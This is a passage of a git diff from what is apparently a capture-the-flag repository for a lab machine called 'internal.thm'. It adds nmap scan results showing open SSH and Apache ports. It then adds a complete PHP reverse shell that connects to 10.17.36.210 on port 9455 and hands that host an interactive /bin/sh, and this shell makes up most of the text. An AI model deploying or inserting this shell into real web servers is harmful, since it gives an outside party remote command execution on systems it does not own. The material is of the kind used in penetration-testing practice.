10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/> +<verbose level="0"/> +<debugging level="0"/> +<host starttime="1646117021" endtime="1646117056"><status state="up" reason="syn-ack" reason_ttl="0"/> +<address addr="10.10.252.197" addrtype="ipv4"/> +<hostnames> +<hostname name="internal.thm" type="PTR"/> +</hostnames> +<ports><extraports state="closed" count="998"> +<extrareasons reason="conn-refused" count="998"/> +</extraports> +<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.3" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:7.6p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="
 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)"><table> +<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABAQCzpZTvmUlaHPpKH8X2SHMndoS+GsVlbhABHJt4TN/nKUSYeFEHbNzutQnj+DrUEwNMauqaWCY7vNeYguQUXLx4LM5ukMEC8IuJo0rcuKNmlyYrgBlFws3q2956v8urY7/McCFf5IsItQxurCDyfyU/erO7fO02n2iT5k7Bw2UWf8FPvM9/jahisbkA9/FQKou3mbaSANb5nSrPc7p9FbqKs1vGpFopdUTI2dl4OQ3TkQWNXpvaFl0j1ilRynu5zLr6FetD5WWZXAuCNHNmcRo/aPdoX9JXaPKGCcVywqMM/Qy+gSiiIKvmavX6rYlnRFWEp25EifIPuHQ0s8hSXqx5</elem> +<elem key="type">ssh-rsa</elem> +<elem key="fingerprint">6efaefbef65f98b9597bf78eb9c5621e</elem> +<elem key="bits">2048</elem> +</table> +<table> +<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMFOI/P6nqicmk78vSNs4l+vk2+BQ0mBxB1KlJJPCYueaUExTH4Cxkqkpo/zJfZ77MHHDL5nnzTW+TO6e4mDMEw=</elem> +<elem key="type">ecdsa-sha2-nistp256</elem> +<elem key="fingerprint">ed64ed33e5c93058ba23040d14eb30e9</elem> +<elem key="bits">256</elem> +</table> +<table> +<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIMlxubXGh//FE3OqdyitiEwfA2nNdCtdgLfDQxFHPyY0</elem> +<elem key="type">ssh-ed25519</elem> +<elem key="fingerprint">b07f7f7b5262622a60d43d36fa89eeff</elem> +<elem key="bits">256</elem> +</table> +</script></port> +<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.29" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.29</cpe></service><script id="http-server-header" output="Apache/2.4.29 (Ubuntu)"><elem>Apache/2.4.29 (Ubuntu)</elem> +</script><script id="http-title" output="Apache2 Ubuntu Default Page: It works"><elem key="title">Apache2 Ubuntu Default Page: It works</elem> +</script></port> +</ports> +<times srtt="175049" rttvar="2937" to="186797"/> +</host> +<runstats><finished time="1646117056" timestr="Tue Mar 1 12:14:16 2022" elapsed="34.54" summary="Nmap done at Tue Mar 1 12:14:16 2022; 1 IP address (1 host up) scanned in 34.54 seconds" exit="success"/><hosts up="1" down="0" total="1"/> +</runstats> +</nmaprun> diff --git a/internal/nmap/initial.nmap b/internal/nmap/initial.nmap new file mode 100644 index 0000000..32501ae --- /dev/null +++ b/internal/nmap/initial.nmap @@ -0,0 +1,17 @@ +# Nmap 7.80 scan initiated Tue Mar 1 12:13:41 2022 as: nmap -sC -sV -oA nmap/initial 10.10.252.197 +Not shown: 998 closed ports +Nmap scan report for internal.thm (10.10.252.197) +Host is up (0.18s latency). +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA) +| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA) +|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Tue Mar 1 12:14:16 2022 -- 1 IP address (1 host up) scanned in 34.54 seconds diff --git a/internal/php-reverse-shell.php b/internal/php-reverse-shell.php new file mode 100644 index 0000000..c9b702a --- /dev/null +++ b/internal/php-reverse-shell.php @@ -0,0 +1,92 @@ +<?php +set_time_limit (0); +$VERSION = "1.0"; +$ip = '10.17.36.210'; // CHANGE THIS +$port = 9455; // CHANGE THIS +$chunk_size = 1400; +$write_a = null; +$error_a = null; +$shell = 'uname -a; w; id; /bin/sh -i'; +$daemon = 0; +$debug = 0; + +if (function_exists('pcntl_fork')) { + $pid = pcntl_fork(); + if ($pid == -1) { + printit("ERROR: Can't fork"); + exit(1); + } + if ($pid) { + exit(0); + } + if (posix_setsid() == -1) { + printit("Error: Can't setsid()"); + exit(1); + } + $daemon = 1; +} else { + printit("WARNING: Failed to daemonise. This is quite common and not fatal."); +} +chdir("/"); +umask(0); +$sock = fsockopen($ip, $port, $errno, $errstr, 30); +if (!$sock) { + printit("$errstr ($errno)"); + exit(1); +} +$descriptorspec = array( + 0 => array("pipe", "r"), + 1 => array("pipe", "w"), + 2 => array("pipe", "w") +); +$process = proc_open($shell, $descriptorspec, $pipes); +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); +printit("Successfully opened reverse shell to $ip:$port"); +while (1) { + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} +?> |